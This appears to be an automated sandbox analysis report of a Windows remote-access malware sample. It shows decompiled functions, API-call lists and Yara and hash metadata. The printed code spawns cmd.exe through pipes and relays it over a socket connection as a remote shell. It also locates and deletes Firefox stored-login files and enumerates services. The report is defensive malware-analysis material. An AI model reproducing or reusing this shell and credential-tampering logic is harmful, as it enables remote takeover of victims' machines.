				if(( *0x41b85c & 0x00000001) != 0) {
					_t142 = 0;
				} else {
					 *0x41b85c =  *0x41b85c | 0x00000001;
					_t142 = 0;
					E00402010(0x41b800, 0);
					E00413E72(E00402F89);
				}
				if(( *0x41b85c & 0x00000002) == 0) {
					 *0x41b85c =  *0x41b85c | 0x00000002;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
					E00413E72(E00402F7E);
				}
				_t50 =  &_v5;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z(_t50);
				_v20 = _v20 | 0xffffffff;
				_v16 = _t142;
				if( *0x41b888 != 0) {
					L12:
					_v24 = _t142;
					PeekNamedPipe( *0x41b858, _t142, _t142, _t142,  &_v24, _t142);
					if(_v24 <= _t142) {
						_t146 = _t146 - 0x10;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v9);
						_t54 = E004020C2(0x41b800, 0x62, 0x415664);
						_v20 = _t54;
					} else {
						_t136 = malloc(_v24);
						_t54 = ReadFile( *0x41b858, _t136, _v24,  &_v28, _t142);
						if(_v28 > _t142) {
							if(_v16 <= _t142) {
								L18:
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v7);
								_t146 = _t146 - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_t142, _v28,  &_v8);
								_t54 = E004020C2(0x41b800, 0x62,  &_v76);
								_v20 = _t54;
							} else {
								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
								_t68 = strncmp(_t136, _t54, _v16);
								_t146 = _t146 + 0xc;
								if(_t68 != 0) {
									goto L18;
								} else {
									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v5);
									_t146 = _t146 - 0x10;
									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_v16, _v28 - _v16,  &_v6);
									_t54 = E004020C2(0x41b800, 0x62,  &_v60);
									_v20 = _t54;
								}
							}
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						}
						free(_t136);
					}
					goto L22;
				} else {
					__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(0x41b860, "cmd.exe");
					if(_t50 == 0) {
						L11:
						if( *0x41b888 != 0) {
							do {
								goto L12;
								L22:
								if(_v20 == 0xffffffff) {
									 *0x41b889 =  *0x41b889 & 0x00000000;
								}
								__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
								if(_t54 <= 0) {
									_v16 = _t142;
								} else {
									__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415770);
									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(0x41b860);
									__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
									WriteFile( *0x41b870,  &_v16,  &_v16,  &_v16, _t142);
									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
								}
								Sleep(0x64);
							} while ( *0x41b889 != 0);
							TerminateProcess(0x41b878->hProcess, _t142);
							CloseHandle( *0x41b87c);
							_t50 = CloseHandle( *0x41b878);
						}
						E004020F4(_t50, 0x41b800);
						CloseHandle( *0x41b858);
						CloseHandle( *0x41b874);
						 *0x41b888 =  *0x41b888 & 0x00000000;
						_t91 = 1;
					} else {
						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(getenv("SystemDrive"));
						__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415774);
						0x41b7f0->nLength = 0xc;
						 *0x41b7f8 = 1;
						 *0x41b7f4 = _t142;
						if(CreatePipe(0x41b7a0, 0x41b870, 0x41b7f0, _t142) == 0 || CreatePipe(0x41b858, 0x41b874, 0x41b7f0, _t142) == 0) {
							_t91 = 0;
						} else {
							_t120 = 0x11;
							memset(0x41b7a8, 0, _t120 << 2);
							_t79 =  *0x41b7a0; // 0x0
							 *0x41b7e0 = _t79;
							_t80 =  *0x41b874; // 0x0
							0x41b7a8->cb = 0x44;
							 *0x41b7d4 = 0x101;
							 *0x41b7d8 = _t142;
							 *0x41b7e4 = _t80;
							 *0x41b7e8 = _t80;
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
							 *0x41b888 = CreateProcessA(_t142, _t80, _t142, _t142, 1, _t142, _t142, _t80, 0x41b7a8, 0x41b878) & 0xffffff00 | _t81 != 0x00000000;
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z();
							 *0x41b889 = 1;
							E00402038(0x41b800);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E0040209B(0x41b800, 0x415664);
							_t146 = _t146 + 0xc;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
							_v20 = E004020C2(0x41b800, 0x93,  &_a4);
							Sleep(0x12c);
							_t142 = 0;
							goto L11;
						}
					}
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t91;
			}
























                                        0x00402b9f
                                        0x00402bbf
                                        0x00402ba1
                                        0x00402ba1
                                        0x00402ba8
                                        0x00402bad
                                        0x00402bb7
                                        0x00402bbc
                                        0x00402bc8
                                        0x00402bca
                                        0x00402bdc
                                        0x00402be7
                                        0x00402bec
                                        0x00402bf4
                                        0x00402bfb
                                        0x00402c01
                                        0x00402c0c
                                        0x00402c0f
                                        0x00402d86
                                        0x00402d94
                                        0x00402d97
                                        0x00402da0
                                        0x00402e77
                                        0x00402e85
                                        0x00402e8f
                                        0x00402e94
                                        0x00402da6
                                        0x00402db0
                                        0x00402dc1
                                        0x00402dca
                                        0x00402dd3
                                        0x00402e33
                                        0x00402e3b
                                        0x00402e41
                                        0x00402e52
                                        0x00402e5c
                                        0x00402e61
                                        0x00402dd5
                                        0x00402ddb
                                        0x00402de3
                                        0x00402de9
                                        0x00402dee
                                        0x00000000
                                        0x00402df0
                                        0x00402df8
                                        0x00402dfe
                                        0x00402e15
                                        0x00402e1f
                                        0x00402e24
                                        0x00402e27
                                        0x00402dee
                                        0x00402e67
                                        0x00402e67
                                        0x00402e6e
                                        0x00402e74
                                        0x00000000
                                        0x00402c15
                                        0x00402c1f
                                        0x00402c29
                                        0x00402d79
                                        0x00402d80
                                        0x00402d86
                                        0x00000000
                                        0x00402e97
                                        0x00402e9b
                                        0x00402e9d
                                        0x00402e9d
                                        0x00402eab
                                        0x00402eb3
                                        0x00402f02
                                        0x00402eb5
                                        0x00402ebc
                                        0x00402eca
                                        0x00402ed7
                                        0x00402ee0
                                        0x00402eed
                                        0x00402efa
                                        0x00402efa
                                        0x00402f07
                                        0x00402f0d
                                        0x00402f21
                                        0x00402f33
                                        0x00402f3b
                                        0x00402f3b
                                        0x00402f47
                                        0x00402f52
                                        0x00402f5a
                                        0x00402f5c
                                        0x00402f63
                                        0x00402c2f
                                        0x00402c3e
                                        0x00402c4b
                                        0x00402c67
                                        0x00402c71
                                        0x00402c7b
                                        0x00402c85
                                        0x00402e2c
                                        0x00402ca5
                                        0x00402cac
                                        0x00402cb6
                                        0x00402cb8
                                        0x00402cbe
                                        0x00402cc3
                                        0x00402ccd
                                        0x00402cd7
                                        0x00402ce1
                                        0x00402ce8
                                        0x00402ced
                                        0x00402cf2
                                        0x00402d06
                                        0x00402d20
                                        0x00402d25
                                        0x00402d2d
                                        0x00402d34
                                        0x00402d45
                                        0x00402d46
                                        0x00402d47
                                        0x00402d48
                                        0x00402d49
                                        0x00402d4e
                                        0x00402d57
                                        0x00402d6e
                                        0x00402d71
                                        0x00402d77
                                        0x00000000
                                        0x00402d77
                                        0x00402c85
                                        0x00402c29
                                        0x00402f68
                                        0x00402f71
                                        0x00402f7d

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                        • getenv.MSVCRT ref: 00402C34
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                        • CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                        • CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                        • CreateProcessA.KERNEL32(00000000,00000000), ref: 00402D0E
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402D25
                                          • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • Sleep.KERNEL32(0000012C,00000093), ref: 00402D71
                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402D97
                                        • malloc.MSVCRT ref: 00402DA9
                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00402DC1
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402DDB
                                        • strncmp.MSVCRT(00000000,00000000), ref: 00402DE3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402DF8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?), ref: 00402E15
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402E3B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?), ref: 00402E52
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000062), ref: 00402E67
                                        • free.MSVCRT(00000000), ref: 00402E6E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00402E85
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402D57
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000062), ref: 00402EAB
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415770), ref: 00402EBC
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0041B860), ref: 00402ECA
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 00402ED7
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402EE0
                                        • WriteFile.KERNEL32(00000000), ref: 00402EED
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402EFA
                                        • Sleep.KERNEL32(00000064), ref: 00402F07
                                        • TerminateProcess.KERNEL32(00000000), ref: 00402F21
                                        • CloseHandle.KERNEL32 ref: 00402F33
                                        • CloseHandle.KERNEL32 ref: 00402F3B
                                        • CloseHandle.KERNEL32 ref: 00402F52
                                        • CloseHandle.KERNEL32 ref: 00402F5A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F68
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F71
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@$D@1@@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseHandle$CreatePipeV01@@$?length@?$basic_string@FileProcessSleepY?$basic_string@$??8std@@D@2@@0@NamedPeekReadTerminateV?$basic_string@Writeconnectfreegetenvmallocstrncmp
                                        • String ID: SystemDrive$cmd.exe
                                        • API String ID: 1882443052-3633465311
                                        • Opcode ID: b6a6d40c412da313f4d3738aa453d8cffe971ab7c1761651370b8d10dcb295f1
                                        • Instruction ID: 0121bb856768c0d2b30f6d73f3edf8f7852bc9241180a475d7ad49acf624a365
                                        • Opcode Fuzzy Hash: b6a6d40c412da313f4d3738aa453d8cffe971ab7c1761651370b8d10dcb295f1
                                        • Instruction Fuzzy Hash: 97B1A531A40209EFCB01AB61DD4DAEE7FB9EB84750F14803AF911A61E0CBB84945DBDC
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040728F, Relevance: 75.5, APIs: 37, Strings: 6, Instructions: 206fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 004072A1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072AE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072BB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 004072CD
                                        • getenv.MSVCRT ref: 004072D9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 004072E5
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004072F1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407303
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040731D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00407327
                                        • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 0040732E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040733A
                                        • FindClose.KERNEL32(000000FF,?,?,?), ref: 00407348
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],00000000), ref: 0040735C
                                          • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                          • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                        • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 0040737F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?), ref: 0040741E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?), ref: 0040742B
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?), ref: 00407437
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407440
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407449
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407463
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407470
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040747C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407485
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040748E
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407497
                                        • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004074A4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 004074FD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00407506
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040750F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V?$basic_string@$D@1@@V10@$V01@@$??4?$basic_string@FileFindV01@$?c_str@?$basic_string@$CloseDeleteFirstNextV10@@getenv
                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                        • API String ID: 3375041920-3681987949
                                        • Opcode ID: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                        • Instruction ID: c62cee961eeb0feb44b1f04b02d1ffc3ba69f98c32627a35338bed2311f0f042
                                        • Opcode Fuzzy Hash: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                        • Instruction Fuzzy Hash: 69712E71C0460EEBCB009BE0DC59DEEBF78AF55355F004176E812E31A0EB74668ACB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004113C9, Relevance: 73.8, APIs: 49, Instructions: 252serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,0041B320), ref: 00411408
                                        • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,?,00000000,?,00410E95,?), ref: 00411438
                                        • GetLastError.KERNEL32 ref: 00411442
                                        • malloc.MSVCRT ref: 00411458
                                        • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,00000000,?,?,00410E95,?), ref: 00411477
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041149B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114A9
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114B5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114BE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114CA
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 004114DB
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114E8
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114F4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114FD
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411509
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041151A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@$??1?$basic_string@$EnumG@2@@0@Hstd@@ServicesStatusV01@V01@@V10@@V?$basic_string@Y?$basic_string@$ErrorLastManagerOpenmalloc
                                        • String ID:
                                        • API String ID: 2829549728-0
                                        • Opcode ID: 58d2b0112fed52923091006d7e237b5b1c9f5be96fd222045ae4672482f29bf9
                                        • Instruction ID: fe864d2e3db6e374d855c0a4c4208b99666831e449a430f346264da0072ddcf9
                                        • Opcode Fuzzy Hash: 58d2b0112fed52923091006d7e237b5b1c9f5be96fd222045ae4672482f29bf9
                                        • Instruction Fuzzy Hash: 5EA1E672C0051AEBCB15DBA0EC98EEEBB78FF58305F04806AF516A2160EB755A45CF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403473, Relevance: 72.0, APIs: 36, Strings: 5, Instructions: 228networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                        • recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                        • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035BB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035CD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004035DE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,FileSize: ,00000000,?,?,?,?), ref: 004035FB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,FileSize: ,00000000,?,?,?,?), ref: 00403608
